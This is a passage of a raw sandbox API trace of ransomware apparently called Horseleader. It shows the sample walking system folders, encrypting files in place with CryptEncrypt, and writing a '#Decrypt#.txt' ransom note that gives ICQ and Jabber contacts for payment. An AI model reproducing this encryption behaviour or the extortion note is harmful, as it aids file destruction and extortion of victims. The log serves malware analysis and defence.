ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x81dbdf30, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaprsr.dll", cAlternateFileName="")) returned 1 [0251.093] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="Windows") returned -1 [0251.093] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 59 [0251.093] StrStrIW (lpFirst="msdaprsr.dll", lpSrch=".horseleader") returned 0x0 [0251.093] lstrcmpW (lpString1="msdaprsr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.093] lstrcmpW (lpString1="msdaprsr.dll", lpString2="_uninstalling_.png") returned 1 [0251.093] lstrlenW (lpString=".testttjffg") returned 11 [0251.093] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", lpSrch=".testttjffg") returned 0x0 [0251.094] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.095] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d295c, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc0d295c, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3497fc70, 
ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5f000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaprst.dll", cAlternateFileName="")) returned 1 [0251.095] lstrcmpiW (lpString1="msdaprst.dll", lpString2="Windows") returned -1 [0251.095] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 59 [0251.095] StrStrIW (lpFirst="msdaprst.dll", lpSrch=".horseleader") returned 0x0 [0251.095] lstrcmpW (lpString1="msdaprst.dll", lpString2="#Decrypt#.txt") returned 1 [0251.095] lstrcmpW (lpString1="msdaprst.dll", lpString2="_uninstalling_.png") returned 1 [0251.095] lstrlenW (lpString=".testttjffg") returned 11 [0251.095] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", lpSrch=".testttjffg") returned 0x0 [0251.095] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.095] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.095] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.095] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93fdbb10, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93fdbb10, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x94001c70, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3d000, 
dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdarem.dll", cAlternateFileName="")) returned 1 [0251.095] lstrcmpiW (lpString1="msdarem.dll", lpString2="Windows") returned -1 [0251.095] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 58 [0251.095] StrStrIW (lpFirst="msdarem.dll", lpSrch=".horseleader") returned 0x0 [0251.096] lstrcmpW (lpString1="msdarem.dll", lpString2="#Decrypt#.txt") returned 1 [0251.096] lstrcmpW (lpString1="msdarem.dll", lpString2="_uninstalling_.png") returned 1 [0251.096] lstrlenW (lpString=".testttjffg") returned 11 [0251.096] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", lpSrch=".testttjffg") returned 0x0 [0251.096] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.096] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.096] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.096] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6a878e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfd6a878e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x835d7620, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaremr.dll", cAlternateFileName="")) returned 1 
[0251.096] lstrcmpiW (lpString1="msdaremr.dll", lpString2="Windows") returned -1 [0251.096] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 59 [0251.096] StrStrIW (lpFirst="msdaremr.dll", lpSrch=".horseleader") returned 0x0 [0251.096] lstrcmpW (lpString1="msdaremr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.096] lstrcmpW (lpString1="msdaremr.dll", lpString2="_uninstalling_.png") returned 1 [0251.096] lstrlenW (lpString=".testttjffg") returned 11 [0251.096] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", lpSrch=".testttjffg") returned 0x0 [0251.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.097] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.097] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdfmap.dll", cAlternateFileName="")) returned 1 [0251.097] lstrcmpiW (lpString1="msdfmap.dll", lpString2="Windows") returned -1 [0251.097] wnsprintfW 
(in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 58 [0251.097] StrStrIW (lpFirst="msdfmap.dll", lpSrch=".horseleader") returned 0x0 [0251.097] lstrcmpW (lpString1="msdfmap.dll", lpString2="#Decrypt#.txt") returned 1 [0251.097] lstrcmpW (lpString1="msdfmap.dll", lpString2="_uninstalling_.png") returned 1 [0251.097] lstrlenW (lpString=".testttjffg") returned 11 [0251.097] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", lpSrch=".testttjffg") returned 0x0 [0251.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.098] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.098] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdfmap.dll", cAlternateFileName="")) returned 0 [0251.098] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.098] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\System\\msadc\\#Decrypt#.txt") returned 60 [0251.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.099] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.099] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.137] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.137] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.138] CloseHandle (hObject=0x21c) returned 1 [0251.138] 
GetProcessHeap () returned 0x780000 [0251.138] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.138] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSMAPI", cAlternateFileName="")) returned 1 [0251.138] lstrcmpiW (lpString1="MSMAPI", lpString2="Windows") returned -1 [0251.138] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI") returned 47 [0251.138] lstrcmpW (lpString1="MSMAPI", lpString2=".") returned 1 [0251.138] lstrcmpW (lpString1="MSMAPI", lpString2="..") returned 1 [0251.138] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.138] GetProcessHeap () returned 0x780000 [0251.138] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0251.138] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*") returned 49 [0251.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.220] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.220] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\.") returned 49 [0251.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.220] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.220] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.220] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\..") returned 50 [0251.220] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.220] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.220] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0251.220] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0251.248] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned 52 [0251.248] 
lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0251.248] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0251.256] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.256] GetProcessHeap () returned 0x780000 [0251.256] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.256] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*") returned 54 [0251.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.257] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.257] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\.") returned 54 [0251.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0251.257] lstrcmpiW 
(lpString1="..", lpString2="Windows") returned -1 [0251.257] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\..") returned 55 [0251.257] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.257] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="MSMAPI32.DLL", cAlternateFileName="")) returned 1 [0251.257] lstrcmpiW (lpString1="MSMAPI32.DLL", lpString2="Windows") returned -1 [0251.257] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0251.258] StrStrIW (lpFirst="MSMAPI32.DLL", lpSrch=".horseleader") returned 0x0 [0251.258] lstrcmpW (lpString1="MSMAPI32.DLL", lpString2="#Decrypt#.txt") returned 1 [0251.258] lstrcmpW (lpString1="MSMAPI32.DLL", lpString2="_uninstalling_.png") returned 1 [0251.258] lstrlenW (lpString=".testttjffg") returned 11 [0251.258] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL", lpSrch=".testttjffg") returned 0x0 [0251.258] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.258] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0251.259] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0251.259] StrStrW (lpFirst="MSMAPI32.DLL", lpSrch=".txt") returned 0x0 [0251.259] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=58752) returned 1 [0251.259] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.265] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.266] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.266] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.267] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.268] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4580, lpOverlapped=0x0) returned 1 [0251.268] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffba80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4580, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4580, lpOverlapped=0x0) returned 1 [0251.269] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.269] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0251.269] WriteFile (in: 